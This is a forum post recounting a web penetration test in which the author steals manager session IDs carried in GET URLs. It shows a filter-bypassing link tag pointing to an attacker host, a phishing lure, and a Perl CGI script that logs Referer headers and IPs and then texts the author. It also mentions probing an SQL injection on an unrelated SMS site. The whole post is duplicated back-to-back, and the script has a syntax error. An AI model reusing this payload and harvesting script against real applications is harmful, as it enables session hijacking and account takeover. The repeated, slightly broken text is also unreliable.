fb1h2s
09-27-2010, 12:48 AM
Last week I was assigned with a WPT , where I was assigned to check a Web Application
Normally in WPT s you will find a lot of bugs if you spend some good time analyzing the application in and out. And Tools like Web Inspect and Appscan are also of a good help to one extend.
But the application I was testing had some sort of filter which prevented the possibilities of any sort of normal web application attacks, and redirected all malicious request to one common error page.And all tools were giving out too many false positives.And I was almost going mad.
It was a module where users could trade objects. And three type of users where there Anonymous Users,Manager Users and as always a super user.Any one could access the anonymous user as the user name password was open for all, after loging in as Anonymous you could trade your things with other users , provided the managers accept it.As all your submissions went via the manager users.
The application dint used any cookies instead it used a session ID , which was passed in on every request via [GET] method
http://site.com/usrpage/?userid={D8A349A7-3503-4283-A1AA-9406DB6EE9C5}
So what strike me was, as that the user session Id hold the authentication and if I could get hold of another valid session I could be in that user privileges. And the only possible way is by tracking the HTTP_REFERRER value. And this could be only possible by making the administrator/manager clicking one of our links form the application. And then we could Hijack the user session. For those who are not aware of what am talking about, read a similar scenario .
http://fb1h2s.com/view.php?article_id=8
In order to achieve that, I need to find an XSS in the section where I could post my data for the manager approval or if managed to send a Hyperlink which when clicked, "boomed" my back end program will store the SessionIds.
But with the current filter which is blocking all unwanted request it was hardly possible.
And I was all stuck at this part, I even tried out all the XSS bypass stuff in http://ha.ckers.org/xss.html and none worked for me, and at that time VInay "vinnu" bro was online and was all ready for help :). I presented my scenario of the Filter and that I want to bypass that he gave me few cool tips , in which converting the Payload string that was a hyper link
<link href="http://evilsite.com/evilscript.py" />
bypassed the filter when half the string was hex encoded and other half was double hexed :).
So now First phase is done and I almost wasted one day :( .
Day 2 :
Now that I knew that I could send the managers with a hyper link and trick him to click the link stating that it was some wonderful products review. But the problem was that I don't know when the manager users will login and administrate my stuffs and the sessions will remain valid only till the user clicks Logout. And I wont be able to stay 24/7 online waiting for the manager to come online.
Even though I stay 3/4 of my time online, I need a better plan .
So I taught of writing an SMS alert application, which will send me an SMS to my phone when ever the click was initiated :D. So i could come online immediately and use the sessions. I chose 160by2.com for this and planned to automate it via perl CGI.
Why perl? because Apache was by default configured to handle perl CGI + Mechanize module in perl wis amazing .
While analyzing the 160by2.com for automating the request I found an SQL injection in one of the Post methods and started playing around with it and wasted few hours. And by night the code was all ready and I send the hyperlink to the victims with a convincing text.
#!c:/perl/bin/perl.exe
#CGI perl woot woot by fb1h2s
use CGI;
use strict;
use WWW::Mechanize;
use HTTP::Cookies;
#lets save session first
open (MYFILE, '>>session.txt);
print MYFILE "\t$ENV{HTTP_REFERER}\n\n";
print MYFILE "\t$ENV{HTTP_USER_AGENT}\n\n";
print MYFILE "\t$ENV{HTTP_ACCEPT}\n\n";
print MYFILE "\t$ENV{REMOTE_ADDR}\n\n";
close (MYFILE);
#inform the master via sms now
my $url = "http://160by2.com/";
my $mobileno = "mymobno"; #usernameno
my $password = "mypass"; #password
my $mobilewoot ="smstothisno"; #no to recive alert
my $woot_woot = " woot woot"; #msg text
my $mech = WWW::Mechanize->new();
$mech->cookie_jar(HTTP::Cookies->new());
$mech->get($url);
#my $output_page = $mech->content();
#print "$output_page";
$mech->form_id('login_form');
$mech->field(htxt_UserName => $mobileno);
$mech->field(txt_Passwd => $password);
$mech->click();
$mech->get("http://www.160by2.com/compose_sms.aspx");
$mech->form_id('frmcompose');
$mech->field(txt_msg => $woot_woot);
$mech->field(txt_mobileno => $mobilewoot);
#//"figure the rest out "
$mech->click();
#my $output_page1 = $mech->content();
#print "$output_page1";
Normally in WPT s you will find a lot of bugs if you spend some good time analyzing the application in and out. And Tools like Web Inspect and Appscan are also of a good help to one extend.
But the application I was testing had some sort of filter which prevented the possibilities of any sort of normal web application attacks, and redirected all malicious request to one common error page.And all tools were giving out too many false positives.And I was almost going mad.
It was a module where users could trade objects. And three type of users where there Anonymous Users,Manager Users and as always a super user.Any one could access the anonymous user as the user name password was open for all, after loging in as Anonymous you could trade your things with other users , provided the managers accept it.As all your submissions went via the manager users.
The application dint used any cookies instead it used a session ID , which was passed in on every request via [GET] method
http://site.com/usrpage/?userid={D8A349A7-3503-4283-A1AA-9406DB6EE9C5}
So what strike me was, as that the user session Id hold the authentication and if I could get hold of another valid session I could be in that user privileges. And the only possible way is by tracking the HTTP_REFERRER value. And this could be only possible by making the administrator/manager clicking one of our links form the application. And then we could Hijack the user session. For those who are not aware of what am talking about, read a similar scenario .
http://fb1h2s.com/view.php?article_id=8
In order to achieve that, I need to find an XSS in the section where I could post my data for the manager approval or if managed to send a Hyperlink which when clicked, "boomed" my back end program will store the SessionIds.
But with the current filter which is blocking all unwanted request it was hardly possible.
And I was all stuck at this part, I even tried out all the XSS bypass stuff in http://ha.ckers.org/xss.html and none worked for me, and at that time VInay "vinnu" bro was online and was all ready for help :). I presented my scenario of the Filter and that I want to bypass that he gave me few cool tips , in which converting the Payload string that was a hyper link
<link href="http://evilsite.com/evilscript.py" />
bypassed the filter when half the string was hex encoded and other half was double hexed :).
So now First phase is done and I almost wasted one day :( .
Day 2 :
Now that I knew that I could send the managers with a hyper link and trick him to click the link stating that it was some wonderful products review. But the problem was that I don't know when the manager users will login and administrate my stuffs and the sessions will remain valid only till the user clicks Logout. And I wont be able to stay 24/7 online waiting for the manager to come online.
Even though I stay 3/4 of my time online, I need a better plan .
So I taught of writing an SMS alert application, which will send me an SMS to my phone when ever the click was initiated :D. So i could come online immediately and use the sessions. I chose 160by2.com for this and planned to automate it via perl CGI.
Why perl? because Apache was by default configured to handle perl CGI + Mechanize module in perl wis amazing .
While analyzing the 160by2.com for automating the request I found an SQL injection in one of the Post methods and started playing around with it and wasted few hours. And by night the code was all ready and I send the hyperlink to the victims with a convincing text.
#!c:/perl/bin/perl.exe
#CGI perl woot woot by fb1h2s
use CGI;
use strict;
use WWW::Mechanize;
use HTTP::Cookies;
#lets save session first
open (MYFILE, '>>session.txt);
print MYFILE "\t$ENV{HTTP_REFERER}\n\n";
print MYFILE "\t$ENV{HTTP_USER_AGENT}\n\n";
print MYFILE "\t$ENV{HTTP_ACCEPT}\n\n";
print MYFILE "\t$ENV{REMOTE_ADDR}\n\n";
close (MYFILE);
#inform the master via sms now
my $url = "http://160by2.com/";
my $mobileno = "mymobno"; #usernameno
my $password = "mypass"; #password
my $mobilewoot ="smstothisno"; #no to recive alert
my $woot_woot = " woot woot"; #msg text
my $mech = WWW::Mechanize->new();
$mech->cookie_jar(HTTP::Cookies->new());
$mech->get($url);
#my $output_page = $mech->content();
#print "$output_page";
$mech->form_id('login_form');
$mech->field(htxt_UserName => $mobileno);
$mech->field(txt_Passwd => $password);
$mech->click();
$mech->get("http://www.160by2.com/compose_sms.aspx");
$mech->form_id('frmcompose');
$mech->field(txt_msg => $woot_woot);
$mech->field(txt_mobileno => $mobilewoot);
#//"figure the rest out "
$mech->click();
#my $output_page1 = $mech->content();
#print "$output_page1";